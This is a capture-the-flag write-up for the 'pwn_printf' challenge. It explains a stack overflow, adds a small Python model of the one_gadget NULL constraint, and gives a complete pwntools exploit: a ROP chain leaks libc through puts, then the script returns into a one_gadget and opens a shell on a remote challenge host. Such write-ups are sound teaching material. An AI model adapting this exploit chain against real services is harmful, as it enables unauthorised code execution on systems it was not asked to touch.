hxb_pwn_printf

pwn_printf

Approach

The program has a function `vul` that contains a stack overflow.

  1. After entering `30` 0x10 times in a row, execution reaches `vul`; at that point write:

    ```python
    payload=b'a'*8+p64(rdi)+p64(pelf.got['puts'])+p64(pelf.plt['puts'])+p64(rdi)+p64(0x200)+p64(vul)
    ```

Use ROP to set the argument of `puts`, leak a libc address with `puts`, then use ROP again to set the length that `vul` reads (rdi = 0x200) and jump back into `vul`.

  2. Use the leaked libc address to locate a one_gadget, then jump to it through the stack overflow to get a shell:

    ```python
    payload = b'a'*8+p64(onegadget)+0x200*b'\x00'
    ```

    Note the one_gadget constraint (`rsp+N == NULL`): keep writing zeros after the gadget address and the condition is satisfied.
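Why the trailing zeros satisfy the `rsp+N == NULL` constraint is easier to see with a small model of the overflowed frame. The following is an added example, not code from the writeup: it packs the payload the same way the writeup does, then works out where `rsp` points once `vul` returns and what the payload leaves at `rsp+N`. The gadget address and the offset `N` are constructed assumptions (the real `N` for a given libc build comes from one_gadget's output, commonly 0x30, 0x50 or 0x70 for the glibc 2.23 gadgets).

```python
import struct


def p64(x):
    """Pack a 64-bit little-endian integer (same role as pwntools' p64)."""
    return struct.pack('<Q', x)


def stack_after_ret(payload, pad):
    """Model the frame after the overflow.

    The first `pad` bytes fill the buffer up to the saved return address and
    the next 8 bytes overwrite it.  When `vul` executes `ret`, rsp moves past
    the return address, so whatever follows in the payload is exactly the
    memory at rsp, rsp+8, ... in the hijacked frame.
    Returns (new_rip, bytes_at_rsp).
    """
    if len(payload) < pad + 8:
        raise ValueError('payload too short to reach the return address')
    new_rip = struct.unpack('<Q', payload[pad:pad + 8])[0]
    return new_rip, payload[pad + 8:]


def qword_at(stack, offset):
    """Qword at rsp+offset, or None if the payload never wrote that slot
    (the real value would then be whatever the program left on the stack)."""
    chunk = stack[offset:offset + 8]
    if len(chunk) < 8:
        return None
    return struct.unpack('<Q', chunk)[0]


def one_gadget_constraint_satisfied(payload, pad, n):
    """True iff the payload guarantees [rsp+n] == 0 at the moment the gadget runs."""
    _, stack = stack_after_ret(payload, pad)
    return qword_at(stack, n) == 0


# Constructed values for illustration only; they are not real addresses.
ONEGADGET = 0x7f00_0004_5000
PAD = 8            # the writeup's b'a'*8 reaches the return address
N = 0x30           # assumed constraint offset; take the real one from one_gadget

# The writeup's layout: padding, gadget, then 0x200 zero bytes.
payload_zeros = b'a' * PAD + p64(ONEGADGET) + 0x200 * b'\x00'
# Same layout but without any padding after the gadget: the slot is not ours.
payload_short = b'a' * PAD + p64(ONEGADGET)
# Same layout with non-zero filler: the slot is written, but not NULL.
payload_junk = b'a' * PAD + p64(ONEGADGET) + b'b' * 0x200

if __name__ == '__main__':
    for name, pl in (('zeros', payload_zeros), ('short', payload_short), ('junk', payload_junk)):
        rip, _ = stack_after_ret(pl, PAD)
        print(name, hex(rip), one_gadget_constraint_satisfied(pl, PAD, N))
```

Only the zero-padded payload both lands on the gadget and controls the slot the constraint inspects; the short payload leaves that slot to whatever the program had on its stack, which is why the writeup fills 0x200 bytes rather than stopping after the gadget address.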

EXP

```python
from pwn import *
from pwnlib.ui import pause

'''
ip: 47.111.104.169
port: 56706
protocol: tcp
'''


context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', "-h"]
# p = process('./pwn_printf')
p = remote('47.111.104.169', 56706)

# breakpoints used for local debugging
# cmd = 'b *0x40112E\n'
cmd = 'b *0x401181\n'
cmd += 'b *0x4007C6'


# gdb.attach(p,cmd)
pelf = ELF('./pwn_printf')
lelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
p.recvuntil('You will find this game very interesting\n')
# 0x10 consecutive inputs of 30 lead into vul
for i in range(0x10):
    p.sendline('30')

rdi = 0x401213       # pop rdi; ret
rsi_r15 = 0x401211   # pop rsi; pop r15; ret (unused)
vul = 0x4007C6
# stage 1: puts(puts@got) leaks libc, then rdi = 0x200 and return into vul
payload = b'a'*8+p64(rdi)+p64(pelf.got['puts'])+p64(pelf.plt['puts'])+p64(rdi)+p64(0x200)+p64(vul)

p.sendline(payload)
puts = u64(p.recvn(6).ljust(8, b'\x00'))
print('puts', hex(puts))
libc = puts-0x06f6a0
print('libc', hex(libc))

r = libc+0x0f7310
print('read', hex(r))

# stage 2: return into one_gadget, zero-padding the stack to satisfy its constraint
onegadget = libc+0x4527a
payload = b'a'*8+p64(onegadget)+0x200*b'\x00'
p.sendline(payload)


p.interactive()
```